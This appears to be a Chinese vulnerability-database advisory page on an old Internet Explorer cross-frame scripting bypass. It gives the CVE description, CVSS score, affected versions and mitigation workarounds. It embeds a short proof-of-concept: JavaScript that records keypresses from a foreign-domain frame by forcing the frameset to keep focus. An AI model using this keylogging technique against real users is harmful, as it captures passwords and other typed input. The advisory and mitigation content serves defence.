发布时间 :2004-12-31 00:00:00
修订时间 :2017-07-10 21:31:50

[原文]Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario; the discloser provides alternate scenarios. Spoofing scenarios are currently included in CVE.

[CNNVD]Microsoft Internet Explorer跨帧脚本限制绕过漏洞(CNNVD-200412-571)

        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。
        问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5:sp2Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:5.5:sp1Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  IDEFENSE  20040227 Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
(UNKNOWN)  BID  9761
(UNKNOWN)  XF  ie-frame-domain-bypass(15337)

- 漏洞信息

Microsoft Internet Explorer跨帧脚本限制绕过漏洞
中危 访问验证错误
2004-12-31 00:00:00 2005-10-20 00:00:00
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。
        问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。

- 公告与补丁


- 漏洞信息 (23766)

Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability (EDBID:23766)
windows remote
2004-02-27 Verified
0 iDefense
N/A [点击下载]

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="" scrolling="auto">

- 漏洞信息

Microsoft IE Cross Frame Scripting Restriction Bypass
Remote / Network Access Input Manipulation, Other
Loss of Integrity
Exploit Public

- 漏洞描述

Microsoft Internet Explorer contains a flaw that may allow a malicious user to bypass certain frame restrictions (aka Cross Frame Scripting aka XFS). The issue is triggered when access validation errors occur within event handling routines. Malicious JavaScript loaded in a parent frame can then record the keyboard events of child frames.

- 时间线

2004-02-27 Unknow
2004-02-27 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workarounds: You must implement two workarounds in order to fully protect your sensitive forms from any XFS attack scenario. Workaround Part 1: The following piece of JavaScript should be loaded on the top of all sensitive forms (login, forgot password, registration etc.). This JavaScript will prevent parent frames from loading your sensitive forms into a child frame. if (top != self) { top.location=self.location; } Workaround Part 2: Internet Explorer 6.x has a little known feature that allows parents frames to call child frames and put them into the restricted zone by specifying security="restricted" in the frame src code. By loading the frame into the restricted zone this disables cookies and active scripting for that child frame. Example: <frame src="" scrolling="auto" security="restricted"> Due to this feature the workaround implemented in part 1 is disabled and thus the JavaScript code is not effective in breaking out of the child frame. The parent frame however still has the ability to use scripting code thus malicious JavaScript can record the keyboard events of the child frame. Applications can protect against this by implementing one of two things. All sensitive forms should do a cookie check to ensure that cookies are enabled in the client browser before displaying the sensitive forms to the user. If the form is loaded into a child frame and placed into the restricted zone the cookie check will fail because cookies are disabled in the restricted zone. Redirect the user if cookies are disabled to an error message saying cookies are a requirement of the use of your application. OR Another alternative is to write your sensitive form fields using JavaScript. If the child frame is infact loaded in a restricted zone, the sensitive form would not build because active scripting is disabled in this zone. This requires a lot more code for each sensitive form you are trying to protect. Note: Microsoft has stated that Internet Explorer 7 will not be available to users who are on the Windows 2000 and below platforms. This means users on these platforms will be using Internet Explorer 6 and be vulnerable to these types of attacks.

- 相关参考

- 漏洞作者

Unknown or Incomplete